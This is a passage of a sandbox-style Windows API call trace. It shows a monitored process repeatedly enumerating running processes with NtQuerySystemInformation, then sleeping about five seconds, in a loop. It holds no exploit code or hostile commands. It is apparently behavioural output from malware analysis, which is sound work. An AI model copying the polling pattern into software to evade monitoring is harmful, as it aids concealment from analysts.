BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.317] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 